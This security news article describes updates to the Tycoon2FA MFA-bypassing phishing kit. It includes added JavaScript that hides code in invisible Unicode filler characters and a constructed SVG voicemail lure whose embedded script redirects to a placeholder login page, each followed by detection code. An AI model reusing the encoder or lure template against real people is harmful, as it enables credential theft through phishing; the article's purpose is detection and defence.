The Tycoon2FA phishing-as-a-service (PhaaS) platform has received updates that make it more sophisticated and harder to detect. First documented by Sekoia researchers in October 2023, Tycoon2FA gained attention for bypassing multi-factor authentication (MFA) on Microsoft 365 and Gmail accounts by proxying the victim's login session and capturing the resulting session cookie. Trustwave now reports that recent updates improve the kit's stealth and evasion, making it more effective at slipping past detection mechanisms.
One of the major changes is the use of invisible Unicode characters to hide binary data inside JavaScript. In this technique, first reported by Juniper Threat Labs, the bytes of the payload are encoded as sequences of characters that render as nothing, such as zero-width or filler code points, and stored in what looks like an empty string literal. A small decoder stub rebuilds the original script at runtime and executes it, so the page behaves exactly as the attacker intends while static pattern matching sees no recognizable keywords, URLs or function names and a human reviewer sees blank space. This adds another layer of obfuscation on top of the kit's existing evasions.
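To make the trick concrete, here is an added example (written for this article, not code from the Tycoon2FA kit or from the Juniper or Trustwave reports) that encodes a redirect into invisible characters, shows what a scanner would see, and then flags and decodes the hidden payload. The two filler code points used as the binary alphabet, the 64-character run threshold and the `decode()` stub name are assumptions for illustration; the sample script is constructed and the URL is a reserved placeholder.

```javascript
// Added example (not from the Trustwave/Juniper reports): a minimal version of
// the "invisible Unicode" trick and a detector for it. The two filler characters
// below are an assumed binary alphabet; a real kit may pick different code points.
const ONE = "\u3164";  // HANGUL FILLER: renders as nothing
const ZERO = "\uFFA0"; // HALFWIDTH HANGUL FILLER: renders as nothing

// Attacker side: encode each payload byte as eight invisible characters (MSB first).
function hideInInvisible(text) {
  const bytes = new TextEncoder().encode(text);
  let out = "";
  for (const b of bytes) {
    for (let i = 7; i >= 0; i--) out += ((b >> i) & 1) ? ONE : ZERO;
  }
  return out;
}

// Runtime decoder stub that a kit would ship next to the "blank" string and feed
// to eval(). Here it only returns the recovered source and never executes it.
function revealFromInvisible(hidden) {
  const bytes = [];
  for (let i = 0; i + 8 <= hidden.length; i += 8) {
    let b = 0;
    for (let j = 0; j < 8; j++) b = (b << 1) | (hidden[i + j] === ONE ? 1 : 0);
    bytes.push(b);
  }
  return new TextDecoder().decode(Uint8Array.from(bytes));
}

// Constructed sample of what a scanner would see: the string literal looks empty.
const REDIRECT_CODE = 'window.location.replace("https://example.invalid/login")';
const SAMPLE_SCRIPT =
  'var blob = "' + hideInInvisible(REDIRECT_CODE) + '";\n' +
  'eval(decode(blob));\n'; // decode() stands in for the kit's own stub (assumed name)

// Defender side: a static signature on the encoding rather than the payload.
// Legitimate scripts contain at most a handful of zero-width/filler characters;
// a run of 64 or more (eight hidden bytes) is almost certainly a hidden payload.
const INVISIBLE = new Set(["\u3164", "\uFFA0", "\u200B", "\u200C", "\u200D", "\u2060", "\uFEFF"]);
const RUN_THRESHOLD = 64; // assumed cut-off; tune against your own JS corpus

function invisibleCharStats(script) {
  let total = 0, longest = 0, run = 0;
  for (const ch of script) {
    if (INVISIBLE.has(ch)) {
      total++;
      run++;
      if (run > longest) longest = run;
    } else {
      run = 0;
    }
  }
  return { total, longest, suspicious: longest >= RUN_THRESHOLD };
}

// Hunting: once a script is flagged, pull out each long run and decode it to see
// the real behaviour without ever running the sample.
function extractHiddenPayloads(script) {
  const runs = script.match(/[\u3164\uFFA0]{64,}/g) || [];
  return runs.map(revealFromInvisible);
}

console.log(invisibleCharStats(SAMPLE_SCRIPT));
console.log(extractHiddenPayloads(SAMPLE_SCRIPT));
```

The detection point is that the encoding itself is the signature: you do not need to know which filler characters the kit chose this week, only that ordinary JavaScript never contains long runs of zero-width or filler code points. Rules in a proxy, EDR script-scanner or YARA can key on that run length, and the decode step turns a hit into an indicator (the real redirect target) for blocking.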
Additionally, the platform has switched from Cloudflare Turnstile to a self-hosted CAPTCHA rendered with the HTML5 canvas element.
Dropping Turnstile removes a third-party dependency whose script and domain are easy to fingerprint, and drawing the challenge on a canvas keeps the text out of the DOM, so automated crawlers and URL scanners that do not solve visual challenges never reach the credential-harvesting page behind it. A self-hosted challenge also gives the operators full control over its look and behaviour, which reduces the chance that domain reputation systems flag the site and makes the phishing kit harder to trace and slower to shut down.
Trustwave also notes an increase in phishing attacks using malicious SVG files, facilitated by Tycoon2FA and other PhaaS platforms.
These SVG files, often disguised as voice-message or cloud-document icons, carry obfuscated JavaScript that redirects the recipient to a fake login page. Because SVG is an XML image format that browsers treat as a full document, an attachment opened directly in a browser can run an embedded script element, whereas the same file displayed through an img tag cannot, and many mail gateways still classify it as a harmless image. The growing use of SVG lures signals a shift in tactics, making it essential for organizations to filter or sandbox SVG attachments, tighten email security controls and move to phishing-resistant MFA such as FIDO2 security keys, whose credentials are bound to the legitimate site's origin and cannot be replayed through a proxied login page.
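As an added illustration (constructed for this article, not a sample from the Trustwave report), the following shows what such a lure looks like and how a mail-gateway or triage script can tell an active SVG from a plain icon. The voicemail wording, the indicator list and the placeholder URL (example.invalid, a reserved name that never resolves) are assumptions; the benign icon is included only to check for false positives.

```javascript
// Added example (not from the Trustwave report): a constructed SVG "voicemail"
// lure and a triage scanner for SVG attachments. The redirect URL is a
// placeholder; example.invalid is reserved and never resolves.
const HIDDEN_URL = "https://example.invalid/login";
const HIDDEN_URL_B64 = Buffer.from(HIDDEN_URL, "utf8").toString("base64");

// What the victim receives: renders as an innocuous icon, but a browser that opens
// the file directly runs the embedded script.
const MALICIOUS_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="240" height="60">
  <rect width="240" height="60" fill="#f3f3f3"/>
  <text x="12" y="36" font-size="14">Voice message (0:42) - click to play</text>
  <script type="text/javascript"><![CDATA[
    var t = atob("${HIDDEN_URL_B64}");
    window.location.replace(t);
  ]]></script>
</svg>`;

// A plain icon with no scripting surface, to check for false positives.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <path d="M12 2L2 7l10 5 10-5-10-5z" fill="#444"/>
</svg>`;

// Static indicators of active content inside an SVG. Any one of these means the
// file is not "just an image" and should be blocked or detonated in a sandbox.
const INDICATORS = [
  { name: "script element",                  re: /<script[\s>]/i },
  { name: "event handler attribute",         re: /\son[a-z]+\s*=/i },
  { name: "javascript: URI",                 re: /javascript:/i },
  { name: "foreignObject (HTML inside SVG)", re: /<foreignObject[\s>]/i },
  { name: "base64 decode call",              re: /\batob\s*\(/ },
  { name: "location redirect",               re: /\blocation\s*(\.\s*(href|replace|assign))?\s*[=(]/ },
];

// Returns which indicators fired; an empty list means no active content was seen.
function scanSvg(svgText) {
  const hits = INDICATORS.filter((i) => i.re.test(svgText)).map((i) => i.name);
  return { active: hits.length > 0, hits };
}

// Pull out base64 string literals handed to atob() and decode them, which
// usually exposes the phishing page URL without executing anything.
function decodeBase64Literals(svgText) {
  const found = [];
  for (const m of svgText.matchAll(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g)) {
    found.push(Buffer.from(m[1], "base64").toString("utf8"));
  }
  return found;
}

console.log(scanSvg(MALICIOUS_SVG));            // active: true, three indicators
console.log(decodeBase64Literals(MALICIOUS_SVG)); // the hidden login URL
console.log(scanSvg(BENIGN_SVG));                // active: false
```

Treat the regex scan as triage, not as a control: the same obfuscation tricks described above (including the invisible-Unicode encoding) will defeat keyword matching. The robust policy is to strip or quarantine SVG attachments at the gateway, or to guarantee they are only ever displayed through an img element, where browsers do not execute embedded script.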